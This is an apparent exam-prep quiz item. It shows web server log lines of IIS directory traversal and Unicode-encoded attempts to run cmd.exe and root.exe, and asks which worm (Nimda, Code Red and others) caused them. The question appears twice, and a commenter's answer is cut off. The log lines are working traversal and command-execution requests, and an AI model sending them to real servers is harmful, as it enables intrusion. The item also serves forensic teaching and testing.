What caused this?

You find the following entries in your web log. Each shows attempted access to either root.exe or cmd.exe.
What caused this? GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%
5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%
5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%
5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%
5c/..xc1x1c../..xc1x1c../..xc1x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..xc1x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..xc0xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..xc1x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%
35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%
35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%
5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%
2f../winnt/system32/cmd.exe?/c+dir

You find the following entries in your web log. Each shows attempted access to either root.exe or cmd.exe.
What caused this?

GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%
5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%
5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%
5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%
5c/..xc1x1c../..xc1x1c../..xc1x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..xc1x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..xc0xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..xc1x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%
35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%
35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%
5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%
2f../winnt/system32/cmd.exe?/c+dir

A.
The Morris worm

B.
The PIF virus

C.
Trinoo

D.
Nimda

E.
Code Red

F.
Ping of Death



Leave a Reply 1

Your email address will not be published. Required fields are marked *


seenagape

seenagape

Correct answer is